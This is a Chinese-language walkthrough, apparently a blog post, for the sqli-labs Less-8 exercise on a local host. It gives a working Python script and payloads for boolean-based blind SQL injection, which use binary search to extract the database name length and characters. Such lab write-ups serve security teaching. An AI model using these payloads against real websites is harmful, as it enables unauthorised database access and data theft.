目录

​编辑

判断库名

1.库名长度

2.库名

---

import requests
import math

url = "http://127.0.0.1/Less-8"

def dblength():
    for i in range(20):
        payload = f"1' and length(database())>{i}-- "
        data = {'id': payload}
        res = requests.get(url, params=data)
        if 'You are in...........' not in res.text:
            return i

def dbname():
    dbname = ''
    length = dblength()
    for i in range(1, length + 1):
        low = 32
        high = 126
        flag = 0
        while low <= high:
            mid = (low + high) // 2
            payload = f"1' and ascii(substr(database(),{i},1))>{mid}-- "
            data = {'id': payload}
            res = requests.get(url, params=data)
            if 'You are in...........' in res.text:
                low = mid
            else:
                high = mid
            if mid == flag:
                dbname += chr(math.floor(mid + 1))
                break
            flag = mid
        print(dbname)
    return dbname


print('dbname is', dbname())

判断库名

1.库名长度

当大于一个不存在的长度的时候，就不会回显：

        

但是这个长度存在的话，会返回一个"You are in........."：

        

所以payload是1' and length(database())>{i}--+

def length():
    for i in range(20):
        payload = f"1' and length(database())>{i}-- "
        data = {'id': payload}
        res = requests.get(url, params=data)
        if 'You are in...........' not in res.text:
            return i

2.库名

长度已经得出来了,然后就一个字符一个字符的判断是什么：

payload：1' and ascii(substr(database(),1,1))>33--+

1.用ascll码对应字母数字，且范围是32-126

2.当没有返回值的时候就说明等于而不是大于，就得出值了。

3.加上二分法判断，比直接遍历要快